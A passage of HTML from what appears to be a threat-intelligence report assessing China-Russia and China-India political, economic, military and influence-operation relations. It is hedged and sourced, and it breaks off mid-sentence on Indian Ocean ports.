        <p>Chinese and Russian leadership almost certainly see each other as primary strategic partners in <a href="https://www.reuters.com/world/xi-putin-hold-phone-call-ukraine-war-anniversary-state-media-says-2025-02-24/">advancing</a> the “multipolar” world. In 2023, Xi <a href="https://www.aljazeera.com/news/2023/3/22/xi-tells-putin-of-changes-not-seen-for-100">said</a> to Putin, “We are the ones driving” changes unseen in a century, and multiple <a href="https://www.airuniversity.af.edu/Portals/10/CASI/documents/Translations/2022-02-04%20China%20Russia%20joint%20statement%20International%20Relations%20Entering%20a%20New%20Era.pdf">joint</a> <a href="https://web.archive.org/web/20250829034246/http://en.kremlin.ru/supplement/6310">statements</a> have noted this goal. Moscow likely views China as having the ability to leverage its significant economic and political influence to amplify Russia’s goal of ushering in a multipolar world with Russia, the US, and China on equal footing. Russia is an advocate for, or a participant in, many of China’s global governance and development initiatives that relate to its goals for a “multipolar” world, including the <a href="https://web.archive.org/web/20250908074225/https://tass.com/politics/2010229">Global Governance Initiative</a>, <a href="https://web.archive.org/web/20230322013452/https://www.fmprc.gov.cn/eng/zxxx_662805/202303/t20230322_11046184.html">Global Security Initiative</a>, and <a href="https://web.archive.org/web/20230322013452/https://www.fmprc.gov.cn/eng/zxxx_662805/202303/t20230322_11046184.html">Global Development Initiative</a>.</p>
        <p>Putin and Xi very likely have a close political relationship, judging from their official statements and the frequency of their visits. Xi and Putin have <a href="https://www.nytimes.com/2024/05/15/world/asia/putin-xi-china-summit.html#:~:text=Putin%20when%20he%20made%20Russia,more%20than%20any%20other%20leader.">met</a> over 40 times since 2012 — more frequently than either has met with any other leader. In February 2022, China and Russia <a href="https://www.cfr.org/report/no-limits-china-russia-relationship-and-us-foreign-policy">declared</a> a “no limits partnership,” and in May 2025, Putin stated that “The comprehensive partnership and strategic cooperation between Russia and China are built on the unshakable principles of equality, mutual support and assistance, as well as the unbreakable friendship between the two states and two nations.” China and Russia’s political alignment has extended to supporting one another at international institutions. For example, they have used their veto powers on the UN Security Council (UNSC) to support one another’s interests, often vetoing resolutions that the other opposes.</p>
        <p>Although Putin and Xi have a close leader-level relationship and there is significant compatibility between Russia’s and China’s goals of increasing their respective global influence at the US’s expense, mistrust almost certainly exists at lower bureaucratic levels. Their voting alignment in the UN General Assembly and UNSC has <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">decreased</a> by roughly 10% since 2018. Although China’s position on the war in Ukraine is officially neutral (and in practice somewhat pro-Russia), the war very likely has had some negative effects on China, including potential trade <a href="https://www.kyivpost.com/post/60241">disruptions</a> and sanctions (<a href="https://www.eldwicklaw.com/uk-us-eu-sanctions-china/">1</a>, <a href="https://www.reuters.com/world/china/china-targets-two-eu-banks-retaliating-blocs-russia-sanctions-package-2025-08-13/">2</a>, <a href="https://edition.cnn.com/2024/10/18/china/us-sanctions-chinese-companies-attack-drones-russia-intl-hnk">3</a>). Nevertheless, China’s foreign minister reportedly made statements to European Union (EU) officials in July 2025 that conveyed that China, while not supporting Russia militarily, <a href="https://www.scmp.com/news/china/diplomacy/article/3316875/china-tells-eu-it-cannot-afford-russian-loss-ukraine-war-sources-say">prefers</a> a protracted conflict in Ukraine because it diverts the US’s focus away from China.</p>
        <p>At least some Russian intelligence officers very likely view China with suspicion, based on a leaked document <a href="https://www.nytimes.com/2025/06/07/world/europe/china-russia-spies-documents-putin-war.html">prepared</a> by the Federal Security Service’s (FSB) Department of Counterintelligence Operations (DKRO) describing China as a significant espionage threat to Russia. Insikt Group lacks context as to the origin and veracity of this memo and whether it reflects unusual levels of concern about Chinese espionage, or simply a recognition by the FSB that Chinese intelligence services –– which are highly capable and aggressive –– are likely to spy on all states, regardless of the level of political cooperation. Even if the memo reflects a concern by the FSB that Chinese espionage might go beyond typical intelligence operations, Putin’s significant control over the Russian bureaucratic apparatus means any misgivings about China among FSB officers are almost certain not to impact the overall China-Russia dynamic.</p>
        <h4>Economic Dynamics</h4>
        <p>Russia very likely views economic cooperation with China as a means to solidify its overall relationship with Beijing and make up for revenue lost from Western sanctions, as noted above. China likely views its economic relationship with Russia primarily as a means to achieve the political objectives described above, although China likely also benefits from technological partnership and the opportunity to expand trade <a href="https://carnegieendowment.org/russia-eurasia/politika/2024/05/china-russia-yuan?lang=en">denominated</a> in Chinese yuan.</p>
        <p>China has purchased increasing amounts of Russian oil and gas since Western sanctions went into effect following Russia’s annexation of Crimea in February 2014, which diminished Russia’s ability to sell oil and gas to Western markets. Since Russia invaded Ukraine in 2022, China’s imports of Russian oil and natural gas have substantially <a href="https://asiasociety.org/policy-institute/china-russia-relations-start-war-ukraine">increased</a>. On September 2, 2025, Russia and China <a href="https://interfax.com/newsroom/top-stories/113563/">signed</a> a legally binding deal to build the long-delayed Power of Siberia 2 pipeline, which will supply 50 billion cubic meters of gas per year. As of 2023, Russia was China’s top crude oil supplier, and China <a href="https://www.bbc.com/news/60571253">buys</a> Russian crude oil at a price that is above the G7/EU price cap, further contributing to China’s role in providing Russia with sanctions relief. However, Chinese companies are likely wary of sanctions penalties, as seen in reportedly <a href="https://oilprice.com/Latest-Energy-News/World-News/Chinese-Oil-Buyers-Reduce-Russian-Purchases.html">cancelled</a> orders of Russian oil following US <a href="https://home.treasury.gov/news/press-releases/sb0290">sanctions</a> in late October 2025.</p>
        <p>In addition to supporting Russia through increased purchase of Russian oil and gas, Beijing has long allowed –– if not encouraged –– the export of <a href="https://carnegieendowment.org/russia-eurasia/politika/2024/05/behind-the-scenes-chinas-increasing-role-in-russias-defense-industry?lang=en">dual-use</a> and <a href="https://www.politico.eu/article/china-firms-russia-body-armor-bullet-proof-drones-thermal-optics-army-equipment-shanghai-h-win/">military-relevant</a> <a href="https://www.rferl.org/a/russia-ukraine-china-sanctions-dual-use-yangjie-technology/33223415.html">goods</a> and <a href="https://www.reuters.com/business/aerospace-defense/chinese-drone-experts-worked-with-sanctioned-russian-arms-maker-sources-say-2025-09-25/">expertise</a>. As of mid-2025, dual-use exports to Russia likely have at least slightly <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">decreased</a> from their peak in 2024.</p>
        <p>Overall trade between China and Russia has also <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">grown</a> significantly since 2014, and particularly since Russia’s full-scale invasion of Ukraine in February 2022. In 2024, total trade reached $245 billion, nearly <a href="https://merics.org/en/china-russia-dashboard-facts-and-figures-special-relationship">double</a> that of 2020. The trade balance has been relatively even, with a slight Russian surplus. Russia’s exports to China have mainly consisted of fossil fuels and natural resources, while China’s exports to Russia are primarily manufactured goods such as automobiles, tractors, and electronics. Infrastructure projects –– such as new border <a href="https://web.archive.org/web/20250918185912/http://english.scio.gov.cn/m/internationalexchanges/2025-05/08/content_117863724.html">crossings</a> –– have helped support increased trade. Technology-oriented research partnerships between Chinese and Russian universities are also <a href="https://www.aspistrategist.org.au/aspis-china-defence-universities-tracker-rising-china-russia-links-defence-industry-ties-dual-use-tech-research/">expanding</a>, and China and Russia have <a href="https://web.archive.org/web/20240517015745/https://tass.com/politics/1789195">announced</a> deepening ties for research into information and communication technologies like artificial intelligence and the Internet of Things (IoT).</p>
        <p>There is also economic friction between China and Russia, though it is likely not significant enough to meaningfully derail deepening bilateral relations. Despite increasing its imports from Russia, China very likely seeks to <a href="https://asiasociety.org/policy-institute/china-russia-relations-start-war-ukraine">avoid</a> overdependence on Russia and has reportedly pressed Russia for cheaper rates. In fall 2024, Chinese financial institutions reportedly began <a href="https://www.reuters.com/business/finance/russia-payment-hurdles-with-china-partners-intensified-august-sources-say-2024-08-30/">halting</a> transactions with Russian customers, and at least one bank did so as recently as September 2025 after being <a href="https://finance.yahoo.com/news/key-chinese-bank-reportedly-halts-092655214.html">sanctioned</a> by the EU. In September 2024, China <a href="https://web.archive.org/web/20250529101130/https://www.gov.cn/zhengce/content/202410/content_6981399.htm">implemented</a> a mechanism to control dual-use goods exports, which may be contributing (alongside threats of US sanctions) to the aforementioned decrease in dual-use exports.</p>
        <h4>Military Dynamics</h4>
        <p>Military cooperation between China and Russia has deepened in recent years, likely with the goal of signaling to the West that they could pose a joint military threat –– a development that is very unlikely to materialize –– and likely sharing tactical and strategic intelligence that could help each state achieve its respective military goals. Since 2018, military exercises between China and Russia have become more <a href="https://www.cfr.org/article/where-china-russia-partnership-headed-seven-charts-and-maps">frequent</a> and more <a href="https://www.iss.europa.eu/publications/briefs/rehearsing-war-china-and-russias-military-exercises">complex</a>, and are expanding into new geographic areas. In 2018, China became the first country outside the former Soviet Union to <a href="https://web.archive.org/web/20250911010902/https://www.nato.int/docu/review/articles/2018/12/20/vostok-2018-ten-years-of-russian-strategic-exercises-and-warfare-preparation/index.html">participate</a> in Russia’s Vostok (East) military exercise, which involved large-scale land and sea operations centered around contingencies in the Pacific. The Vostok 2022 exercise <a href="https://www.scmp.com/news/china/diplomacy/article/3192074/signs-china-russia-military-trust-vostok-2022-war-games">involved</a> a more comprehensive Chinese contingent, as it represented the first time all three Chinese military components — land, sea, and air — participated in a Russian military exercise. In mid-2024, the Chinese and Russian militaries conducted a joint bomber <a href="https://www.norad.mil/Newsroom/Press-Releases/Article/3849184/norad-detects-tracks-and-intercepts-russian-and-prc-aircraft-operating-in-the-a/">flight</a> into the US’s air defense identification zone (ADIZ) around Alaska for the first time. 
In September 2025, China and Russia <a href="https://jamestown.org/program/first-joint-russian-prc-submarine-exercise-patrols-pacific/">conducted</a> their first joint submarine patrol (or other exercise) in the Sea of Japan and East China Sea. Insikt Group has not identified any instances of declared Russian and Chinese forces deploying together to an active combat zone.</p>
        <p>In October 2024, Russian Minister of Defense Andrey Belousov met with Chinese military officials in Beijing, after which he <a href="https://web.archive.org/web/20241031071355/https://www.rt.com/russia/605735-russia-china-military-cooperation/">stated</a> that Russia and China have “common views, a common assessment of the situation, and a common understanding of what [needs to be done]” to maintain global stability. China’s readout from one of these meetings further <a href="https://web.archive.org/web/20241108084758/https://www.gov.cn/lianbo/bumen/202410/content_6980333.htm">indicates</a> that bilateral military cooperation aims to defend China and Russia’s “common interests” and “maintain global strategic stability.”</p>
        <p>Beyond military exercises, US officials have <a href="https://www.politico.eu/article/united-states-accuse-china-help-russia-war-kurt-campbell/">asserted</a> as recently as September 2024 that Russia, in exchange for support from China for the war effort in Ukraine, is providing military technical support to China in new areas, including in relation to submarine operations, aeronautical design (including stealth), and missile capabilities. The Ukrainian government <a href="https://www.theguardian.com/world/2025/apr/18/ukraine-war-briefing-china-arming-russia-and-building-weapons-on-its-soil-says-zelenskyy">asserts</a> that China is supplying weapons to Russia, including gunpowder and artillery; that “Chinese representatives” are producing weapons in Russia; and that China is <a href="https://archive.ph/Ewzr6">providing</a> Russia with satellite intelligence that supports missile strikes in Ukraine. In January 2023, the US <a href="https://www.bbc.com/news/world-asia-china-64421915">sanctioned</a> a Chinese satellite imagery provider for enabling Russian combat operations. As of September 2025, “Chinese drone experts” were <a href="https://www.reuters.com/business/aerospace-defense/chinese-drone-experts-worked-with-sanctioned-russian-arms-maker-sources-say-2025-09-25/">working</a> on military drone development in Russia, according to Reuters. At least two Chinese commercial ships have been <a href="https://www.cbsnews.com/news/eagle-s-how-yi-peng-3-and-newnew-polar-bear-wreaked-havoc-in-baltic-sea-60-minutes/">involved</a> in Baltic Sea submarine cable-cutting incidents, though Beijing’s involvement in these incidents is unclear.</p>
        <p>Despite China and Russia’s deepening military relationship, there likely remain limits to the amount of military support Russia is willing to provide to China in the event China is involved in an active conflict such as an invasion of Taiwan. China and Russia have not established a formal alliance or mutual defense pact, so Russia’s level of support would depend on Putin’s calculus. Given the significant resources Russia has devoted to its conflict in Ukraine –– including casualties higher than all conflicts Russia has fought in since World War II combined –– and the fact that Russia does not have a direct stake in the outcome of a Chinese invasion of Taiwan, Russia likely would provide China with only enough support to prevent alienating Beijing. That could include logistical and intelligence support as well as provision of air defense systems such as the S-400.</p>
        <h4>Cooperation in Propaganda and Influence Operations</h4>
        <p>We assess China and Russia have deepened their cooperation on overt state propaganda and influence operations, likely because their shared strategic goal of curbing US influence translates into convergence on desired media narratives and disinformation campaigns. Since the early 2000s, China and Russia have increasingly institutionalized their media relationship, <a href="https://www.wilsoncenter.org/publication/china-russia-convergence-communication-sphere-exploring-growing-information-nexus">including</a> media forums, journalist exchange activities, co-produced content, and mutually supportive media. In May 2025, China and Russia released a joint statement <a href="https://web.archive.org/web/20250509070130/https://www.gov.cn/yaowen/liebiao/202505/content_7023051.htm">stating</a> that they would “jointly articulate a common stance in the global media space.”</p>
        <p>China and Russia have very likely amplified each other’s influence narratives, though we do not have evidence to suggest technical coordination of influence campaigns. Leaked correspondence from the Russian State Television and Radio Company (VGTRK) <a href="https://theintercept.com/2022/12/30/russia-china-news-media-agreement/">shows</a> that, since at least 2021, Russia and China have had formal agreements to share content and coordinate content distribution at the ministerial level. In December 2022, a China-linked network of inauthentic activity, Empire Dragon (also known as Spamouflage), <a href="https://www.recordedfuture.com/ko/research/empire-dragon-accelerates-covert-information-operations-converges-russian-narratives">spread</a> narratives supporting Russia’s claims that the US is developing biological weapons in Ukraine. Empire Dragon has also likely <a href="https://www.philstar.com/headlines/2025/08/25/2466374/copypasta-army-vietnam-smeared-bots-backing-duterte-x">used</a> a Russia-based social media account reseller, and accounts associated with Empire Dragon have, at times, been used to share Russian inauthentic content. China and Russia have likely used the same inauthentic social media account services to disseminate their influence narratives.</p>
        <p>Since approximately 2019, China has <a href="https://demtech.oii.ox.ac.uk/wp-content/uploads/sites/12/2019/09/CyberTroop-Report19.pdf">increasingly</a> used computational propaganda and influence operation tactics likely <a href="https://www.washingtonpost.com/outlook/trump-wants-china-to-help-him-win-china-wants-nothing-to-do-with-him/2019/10/10/15fddd9a-eadf-11e9-9c6d-436a0df4f31d_story.html">learned</a> by observing Russia, but whether there is a more formal exchange of methods occurring is unknown. Chinese media outlets consistently <a href="https://journals.sagepub.com/doi/pdf/10.1177/17427665251328117?utm_source=chatgpt.com">frame</a> the Russia-Ukraine war as a US-Russia proxy war, criticize Western hegemony, cast Russia as a rational actor defending its own sovereignty, call Ukraine reckless, and describe the EU as internally fractured. In March 2022, when Meta <a href="https://www.theverge.com/2022/3/1/22956532/facebook-russian-state-media-global-recommendation-suspension">banned</a> Russian state media outlets from purchasing ads on its platforms, China Global TV Network <a href="https://www.axios.com/2022/03/09/chinas-state-media-meta-facebook-ads-russia?utm_source=chatgpt.com">placed</a> at least 21 pro-Russia advertisements on Facebook in a single month.</p>
        <h3>China-India: Nascent Thaw of Longtime Tension-Filled Relationship</h3>
        <p>China-India relations have <a href="https://strategicspace.nbr.org/cooperation-coexistence-and-contestation-in-indias-and-chinas-overlapping-strategic-spaces/">gone</a> through cycles of cooperation and competition for decades, and have been marked by border tensions since 1962, when China and India fought a war over their contested border. Beijing likely primarily views India through the prism of its broader security environment, and Beijing’s suspicion of India is likely rooted, at least in part, in China’s rivalry with the US and the US’s perceived efforts to encircle China. China’s close relationship with Pakistan, India’s longstanding regional rival, likely also contributes to New Delhi’s wariness of Beijing.</p>
        <p>In recent months, China-India relations have likely <a href="https://web.archive.org/web/20250906232150/https://thediplomat.com/2025/09/china-india-transactional-thaw-or-structured-detente/">returned</a> to a positive trajectory, driven primarily by high-level diplomatic overtures and deepening trade relations. US tariff policy towards India has likely <a href="https://www.nytimes.com/2025/08/18/world/asia/india-china-trump.html">driven</a> India to pursue <a href="https://timesofindia.indiatimes.com/blogs/toi-edit-page/first-tango-in-five-years/">improved</a> ties with China. Modi and Xi have framed their countries as “development partners and not rivals,” <a href="https://timesofindia.indiatimes.com/business/india-business/donald-trumps-tariffs-on-india-pm-modi-and-donald-trump-sco-meet-india-and-china-vladimir-putin/articleshow/123547432.cms">challenging</a> years of US efforts to bolster India’s role as a counterweight to China’s growing economic and political influence. Modi’s statement following his meeting with Xi on August 31, 2025, <a href="https://www.indiatoday.in/india/story/read-full-statement-on-pm-modi-bilateral-meeting-with-president-xi-at-tianjin-sco-summit-2779553-2025-08-31">noted</a> that “a stable relationship and cooperation” was critical for “the growth and development of the two countries, as well as for a multipolar Asia befitting the trends of the 21st century” — alluding to India’s view that it constitutes a major power center in Asia alongside China. 
Despite this nascent <a href="https://indianexpress.com/article/india/modis-china-visit-in-2-readouts-a-message-and-a-signal-strategic-autonomy-fair-trade-10222915/">rapprochement</a>, significant hurdles and unresolved disagreements <a href="https://web.archive.org/web/20250725103521/https://thediplomat.com/2025/07/the-limits-of-pragmatic-intentions-the-evolving-story-of-china-india-rapprochement/">remain</a>, making it less likely that China and India will form a long-term strategic partnership.</p>
        <h4>Political Dynamics</h4>
        <p>China’s approach to India is likely primarily <a href="https://carnegieendowment.org/research/2022/12/a-historical-evaluation-of-chinas-india-policy-lessons-for-india-china-relations?lang=en">driven</a> by the perceived threats posed by India’s relationship with other powers and perceived anti-China coalitions, rather than cooperation and competition with India on its own terms. Beijing’s perception that a stronger India-US relationship poses a threat to China’s interests is likely a principal factor today. China has sought to <a href="https://chinapower.csis.org/analysis/china-upgrading-dual-use-xiaokang-villages-india-border/">consolidate</a> control over disputed border territories, <a href="https://www.usip.org/publications/2023/05/why-we-should-all-worry-about-china-india-border-dispute">leading</a> to deadly skirmishes with India and <a href="https://www.recordedfuture.com/ko/research/redecho-targeting-indian-power-sector">cyberattacks</a> <a href="https://www.recordedfuture.com/ko/research/continued-targeting-of-indian-power-grid-assets">against</a> Indian critical infrastructure. India’s approach to China has likely been <a href="https://www.cfr.org/backgrounder/china-india-relationship-between-cooperation-and-competition">rooted</a> in efforts to curb China’s economic ambitions and regional assertiveness, as well as its longstanding border dispute with China.</p>
        <p>Over the last year, China and India’s relations have <a href="https://www.reuters.com/world/china/ties-thaw-between-asian-rivals-india-china-2025-08-29/">thawed</a> significantly, especially compared to 2020, when the China-India border dispute <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">escalated</a>. In 2024, China and India <a href="https://www.cnn.com/2024/10/22/asia/india-china-border-agreement-intl-hnk">concluded</a> an agreement that <a href="https://www.reuters.com/world/asia-pacific/india-china-start-pulling-back-troops-border-face-off-points-source-says-2024-10-25/">returned</a> the border to its pre-2020 status, thereby completing a disengagement process and <a href="https://www.indiatoday.in/india/story/india-china-reopen-three-himalayan-trade-passes-after-five-years-2775110-2025-08-22">reopening</a> border trade. India and China began <a href="https://frontline.thehindu.com/world-affairs/india-china-relations-border-economic-trade/article69996270.ece">re-engaging</a> in diplomatic dialogue at the highest level, including a meeting between Modi and Xi on the sidelines of the BRICS summit in Kazan, Russia, in October 2024. In September 2025, Modi visited China for the first time in seven years to attend the 2025 SCO Summit, during which China and India <a href="https://www.lowyinstitute.org/the-interpreter/what-resuming-direct-india-china-flights-reveals-about-changing-regional-priorities">resumed</a> direct commercial flights after a five-year freeze. Chinese Foreign Minister Wang Yi and Indian External Affairs Minister Subrahmanyam Jaishankar <a href="https://web.archive.org/web/20250822085634/https://www.fmprc.gov.cn/eng/wjbzhd/202508/t20250819_11692398.html">emphasized</a> the importance of continued cooperation between the two countries.</p>
        <p>Despite China and India’s recent diplomatic and economic overtures, tensions remain, particularly around India’s likely suspicions of China’s regional assertiveness and its likely hesitancy to join a persistent anti-Western bloc. Both countries have <a href="https://web.archive.org/web/20250822085634/https://www.fmprc.gov.cn/eng/wjbzhd/202508/t20250819_11692398.html">endorsed</a> the idea of a multipolar world, but Modi has <a href="https://trackingpeoplesdaily.substack.com/p/analysis-of-the-modi-xi-meeting-in?utm_source=publication-search">emphasized</a> the need for a multipolar Asia, likely highlighting continuing tensions that stem from China’s economic influence, military power, and international assertiveness. India likely <a href="https://www.chathamhouse.org/2025/07/back-back-brics-and-quad-meetings-highlight-indias-increasingly-difficult-balancing-act">seeks</a> to <a href="https://moderndiplomacy.eu/2025/09/13/india-and-china-as-beacons-of-multipolarity/">balance</a> asserting itself as a regional power while maintaining good relations with the US. As such, India has not mirrored Russia and China’s strong advocacy for de-dollarization and replacing the international financial system with one based on China’s currency; it has only <a href="https://timesofindia.indiatimes.com/business/india-business/de-dollarisation-not-on-agenda-india-rebuffs-brics-currency-conspiracy-claims-exploring-cross-border-rupee-use/articleshow/122663479.cms">supported</a> inter-BRICS trade based on local currency.</p>
        <h4>Economic Dynamics</h4>
        <p>We assess that China-India economic relations are generally positive, though India took steps to limit Chinese investment during the COVID-19 pandemic and during the 2020 border clashes. In April 2020, India <a href="https://web.archive.org/web/20211231125626/https://dpiit.gov.in/sites/default/files/pn3_2020.pdf">issued</a> Press Note 3, which <a href="https://carnegieendowment.org/research/2025/08/india-china-economic-ties-determinants-and-possibilities?lang=en">limited</a> Chinese investment and existing investments; new Chinese foreign direct investment cumulatively fell by approximately 80% in the 2021–2024 period compared to prior to 2021, and the number of active Chinese companies in India declined by nearly 500. For example, India reportedly <a href="https://archive.ph/uRVbz">rejected</a> a proposed $1 billion investment by China’s electric car maker BYD in 2023 over national security concerns, and a visa ban on Chinese tourists reportedly constrained BYD’s lobbying efforts.</p>
        <p>Despite Indian actions to limit Chinese investment, India’s economy likely remains heavily <a href="https://www.indiatoday.in/business/story/make-in-india-made-in-china-manufacturing-economics-trade-deficit-report-pm-modi-geopolitical-2769387-2025-08-11">dependent</a> on Chinese supply chains, which very likely <a href="https://www.usip.org/publications/2025/06/how-vulnerable-india-chinese-economic-coercion">gives</a> Beijing some economic leverage over India.</p>
        <p>India faces a significant and growing trade deficit with China — <a href="https://eoibeijing.gov.in/eoibejing_pages/MjQ,">reaching</a> $99.21 billion between 2024 and 2025 — and this imbalance has more than doubled in four years. China <a href="https://www.usip.org/publications/2025/06/how-vulnerable-india-chinese-economic-coercion">remains</a> India’s top import source for many goods and commodities critical to its own industrial output, including electronics, telecommunications, electrical products, and machinery.</p>
        <p>India has taken actions to <a href="https://timesofindia.indiatimes.com/business/india-business/how-india-is-planning-to-lower-reliance-on-china-for-its-supply-chains-new-plan-in-works/articleshow/104669779.cms">reduce</a> its dependence on Chinese investment and develop its own competitive advantage. Modi’s administration has <a href="https://www.pib.gov.in/PressReleasePage.aspx?PRID=2107825">bolstered</a> <a href="https://ibef.org/economy/make-in-india">investment</a> in domestic production and <a href="https://www.cato.org/policy-analysis/indias-new-protectionism-threatens-gains-economic-reform#introduction">implemented</a> protectionist policies, such as the “<a href="https://www.pmindia.gov.in/en/major_initiatives/make-in-india/">Make in India</a>” policy, the <a href="https://www.pib.gov.in/PressNoteDetails.aspx?id=155082&amp;NoteId=155082&amp;ModuleId=3">Production-Linked Incentive</a> (PLI) scheme, and, most recently, the “<a href="https://www.impriindia.com/insights/manufacturing-mission-2025/">National Manufacturing Mission</a>.” Threatening China’s economic and technological interests, India <a href="https://economictimes.indiatimes.com/tech/technology/non-chinese-lending-apps-including-payus-lazypay-kissht-blocked-on-meitys-order/articleshow/97656552.cms?from=mdr">banned</a> hundreds of Chinese-developed mobile applications and has <a href="https://www.hindustantimes.com/world-news/trust-replaces-icet-new-brand-old-spirit-on-tech-partnership-101739524899203.html">pursued</a> <a href="https://carnegieendowment.org/posts/2024/09/india-us-relations-beyond-the-modi-biden-dynamic?lang=en">efforts</a> with the US to develop advanced technology supply chains. China has pushed back against some of these efforts. 
For example, China may have sought to <a href="https://restofworld.org/2025/china-foxconn-factoriesfoxconn-stops-sending-chinese-workers-to-india-iphone-factories/">impede</a> Apple from <a href="https://www.aljazeera.com/economy/2025/4/25/apple-to-move-assembly-of-us-phones-to-india-in-shift-away-from-china">moving</a> its supply chain for US phones from China to India.</p>
        <p>Another area of tension in the China-India economic relationship is very likely China’s increasing investment in South Asia, which conflicts with India’s “Neighbourhood First” policy, in which India <a href="https://www.orfonline.org/research/a-decade-of-neighbourhood-first-perspectives-from-south-asia">views</a> the region as its primary sphere of influence. The policy, <a href="https://www.tandfonline.com/doi/full/10.1080/09700161.2025.2545143?src=">considered</a> a “defining subset of its overall foreign policy,” <a href="https://www.mea.gov.in/lok-sabha.htm?dtl/38762/QUESTION+NO+262+INDIAS+NEIGHBOURHOOD+FIRST+POLICY">hinges</a> on India fostering connectivity, trade, and stability across the region. India likely perceives China’s engagement in South Asia as an effort to exert dominance in a region vital to India’s strategic interests. India almost certainly <a href="https://economictimes.indiatimes.com/news/india/india-reiterates-opposition-to-chinas-belt-and-road-initiative-at-sco-conclave/articleshow/114282891.cms?from=mdr">opposes</a> China’s Belt and Road Initiative (BRI) because New Delhi <a href="https://www.cfr.org/backgrounder/chinas-massive-belt-and-road-initiative">views</a> China’s strategy –– an expansive development and investment project originally devised to construct infrastructure linking East Asia and Europe –– as seeking to dominate the region and <a href="https://www.researchgate.net/publication/380693831_China's_Belt_and_Road_Initiative_A_Threat_to_Indian_Economy_and_Sovereignty">counter</a> India’s regional influence, posing a direct threat to Indian sovereignty. 
A specific point of contention is the China-Pakistan Economic Corridor (CPEC) — a 3,000-kilometer, over $60 billion project <a href="https://finsindia.org/the-rise-of-china-as-a-threat-to-indias-national-security.html">linking</a> China and Pakistan through roads, railways, and pipelines — which India almost certainly <a href="https://web.archive.org/web/20250616104947/https://www.business-standard.com/external-affairs-defence-security/news/cpec-against-our-territorial-integrity-sovereignty-mea-on-pojk-124053001668_1.html">perceives</a> as the most immediate <a href="https://www.orfonline.org/research/indias-latest-concerns-with-the-cpec?">threat</a> to Indian sovereignty, as it runs through disputed territory in Pakistan-occupied Kashmir. The CPEC aims to <a href="https://www.financialexpress.com/world-news/china-exits-pakistans-60-billion-cpec-flagship-project-islamabad-turns-to-adb-for-funding/3968043/">facilitate</a> Chinese energy imports while <a href="https://merics.org/en/analysis/bri-pakistan-chinas-flagship-economic-corridor">strengthening</a> Pakistan’s economy and strategic connectivity, and Beijing’s backing of Islamabad with resources and infrastructure is likely a major <a href="https://www.ndtv.com/india-news/high-degree-of-collusivity-indian-army-chief-general-upendra-dwivedi-on-pakistan-china-7879130?">concern</a> for India.</p>
        <p>Despite tensions, the value of China’s annual exports to India was greater between 2020 and 2024 than between 2016 and 2020, and was approximately $20 billion <a href="https://www.china-briefing.com/news/china-india-economic-ties-trade-investment-and-opportunities/">more</a> in 2021 than in 2018. The total value of foreign direct investment from China into India also <a href="https://carnegieendowment.org/research/2025/08/india-china-economic-ties-determinants-and-possibilities?lang=en">returned</a> to an upward trajectory after 2021, and particularly in 2024. Multilateral fora such as BRICS and the Asian Infrastructure Investment Bank (AIIB) likely provide additional mechanisms for economic cooperation. China <a href="https://www.reuters.com/article/business/china-launches-new-aiib-development-bank-as-power-balance-shifts-idUSKCN0UU040/">launched</a> the AIIB in 2016, and the bank has dozens of <a href="https://www.aiib.org/en/projects/list/index.html">approved</a> projects in India.</p>
        <h4>Military Dynamics</h4>
        <p>We assess that, since 2020, the China-India military dynamic has centered primarily around a longstanding border dispute and each state’s suspicions of the other’s regional ambitions.</p>
        <p>India and China <a href="https://www.bbc.co.uk/news/world-asia-53062484">share</a> a contested 3,440-kilometer (2,100-mile) border in the Himalayas over which the two countries have had an ongoing, historic <a href="https://www.chathamhouse.org/2025/04/how-china-india-relations-will-shape-asia-and-global-order/evolution-border-dispute">dispute</a>. The two states compete to build infrastructure along the border, known as the Line of Actual Control. The border rivalry <a href="https://www.reuters.com/world/asia-pacific/what-was-india-china-military-clash-2020-about-2024-10-25/">devolved</a> into open confrontation in the Galwan Valley in June 2020, resulting in the deaths of twenty Indian and four Chinese soldiers. Four years of tension <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">followed</a>, during which each side <a href="https://eastasiaforum.org/2024/11/29/china-india-pact-a-borderline-solution/">built</a> up troops in the contested areas. After at least 21 <a href="https://web.archive.org/web/20240221235015/https://mea.gov.in/press-releases.htm?dtl/37645/21st_round_of_IndiaChina_Corps_Commander_Level_Meeting">rounds</a> of Senior Highest Military Commander Level (Corps Commander) talks and other <a href="https://carnegieendowment.org/research/2024/12/negotiating-the-india-china-standoff-2020-2024?lang=en">efforts</a>, India and China <a href="https://www.mea.gov.in/rajya-sabha.htm?dtl/38689/QUESTION+NO+1199+RECENTLY+SIGNED+BORDER+AGREEMENTS+WITH+CHINA">signed</a> an agreement in 2024, which led to the <a href="https://www.ndtv.com/world-news/explained-india-china-border-patrol-agreement-and-why-it-is-important-6844560">disengagement</a> of troops. 
Even with border tensions currently defused, the overarching territorial dispute very likely <a href="https://warontherocks.com/2025/09/the-limits-of-rapprochement-between-india-and-china/">persists</a> as a potential strategic flashpoint in the future. As such, military cooperation is unlikely; after the 2025 SCO summit, Modi did not attend the military parade organized in Beijing to commemorate the 80th anniversary of the end of World War II.</p>
        <p>In addition, China’s efforts to assert military power via naval exercises in the Indian Ocean Region (IOR) are likely a particular point of contention between China and India. China’s People’s Liberation Army (PLA) is increasingly active <a href="https://www.iiss.org/online-analysis/charting-china/2025/05/china-in-the-indian-ocean-a-stronger-indo-pacific-presence/">throughout</a> the IOR, often as part of air, land, and sea-based multilateral exercises but also to <a href="https://web.archive.org/web/20250925141545/https://news.cctv.com/2024/04/21/ARTI7yNAn6ts4xOPCejjB2v8240421.shtml">support</a> the PLA Navy’s “Far Seas Protection” <a href="https://digital-commons.usnwc.edu/cgi/viewcontent.cgi?article=1012&amp;context=cmsi-maritime-reports">strategy</a>. In addition to military exercises, the PLA makes <a href="https://c4ads.org/reports/harbored-ambitions/">use</a> of <a href="https://direct.mit.edu/isec/article-abstract/46/4/9/111175/Pier-Competitor-China-s-Power-Position-in-Global?redirectedFrom=fulltext">commercial ports</a> in the IOR, some of which are owned or operated by Chinese state-owned enterprises. New Delhi very likely <a href="https://www.indiatimes.com/news/india/here-is-all-you-should-know-about-string-of-pearls-china-s-policy-to-encircle-india-324315.html">perceives</a> China’s regional cultivation of dual-use commercial ports, its naval base in Djibouti, and its likely naval facility access in Cambodia — sometimes <a 